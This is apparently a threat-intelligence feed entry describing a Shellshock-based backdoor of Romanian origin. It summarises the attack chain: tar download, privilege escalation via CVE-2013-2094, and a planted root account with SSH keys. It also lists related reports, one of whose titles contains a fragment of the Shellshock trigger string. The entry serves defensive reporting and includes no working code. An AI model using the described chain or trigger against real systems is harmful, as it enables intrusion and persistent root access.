Trusted Design

Romanian Shellshock Backdoor

概要

This backdoor was discovered while digging through apache logs for shellshock exploitation attempts and inspecting the malicious payloads associated with them. This attack initially exploits CVE-2014-6271 (shellshock) to download a tar file on the system after which the contents of the tar file are extracted to the file system in the /tmp directory. After extracting the files to the file system xcron.sh is run, which looks for /lib/libpcprofile.so on the system and attempts to further exploit CVE-2013-2094 in order to elevate privileges to root. Upon successful exploitation of CVE-2013-2094 the software will install a root account on the system in addition to SSH keys which allows the attacker to remotely log in to the system as root. The attack originated out of an IP in Germany, however strings contained within the backdoor scripts suggest the software is of Romanian origin.

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

• US Based Shellshock attacks (score: 0.67)
• New ELF malware on Shellshock: the ChinaZ (score: 0.64)
• Attacker scanning for Shellshock CVE-2014-6271 (score: 0.64)
• Poor LinuxWebServer{ :;}; ShellSHOck Attempts BACK-CVE-2014-6271 (score: 0.60)
• Shellshock exploit attempt (score: 0.60)

このPulseに関連する脅威アクター (事実ベース)

このPulseに関連する脅威アクター (推論ベース)

Related CVEs

Pulse – 脅威アクター グラフ

---

← Pulse一覧に戻る